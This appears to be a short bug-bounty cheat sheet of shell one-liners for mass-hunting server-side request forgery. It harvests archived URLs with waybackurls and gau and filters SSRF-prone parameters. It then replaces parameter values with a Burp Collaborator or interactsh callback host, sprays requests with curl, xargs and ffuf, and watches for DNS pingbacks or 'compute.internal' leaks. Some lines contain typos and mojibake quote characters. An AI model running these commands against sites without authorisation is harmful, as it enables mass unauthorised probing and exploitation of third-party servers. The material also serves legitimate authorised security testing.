cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'
cat wayback.txt | grep "=" | qsreplace "burpcollaborator_link" >> ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
#Mass Hunting , multistep process
waybackurl target.com >> blindssrftesturl.txt
gau -subs target.com >> blindssrftesturl.txt
cat blindssrftesturl.txt | sort -u |anew | httpx |tee -a prefinal_ssrftesturl.txt
cat prefinal_ssrftesturl.txt | gf ssrf >> final_ssrftesturl.txt
cat final_ssrftesturl.txt |qsreplace โinterctsh-urlโ >> ssrf_auto-ffuf.txt
ffuf -c -w ssrf_auto-ffuf.txt -u FUZZ
Then check for any dns pingback hit your interactsh server.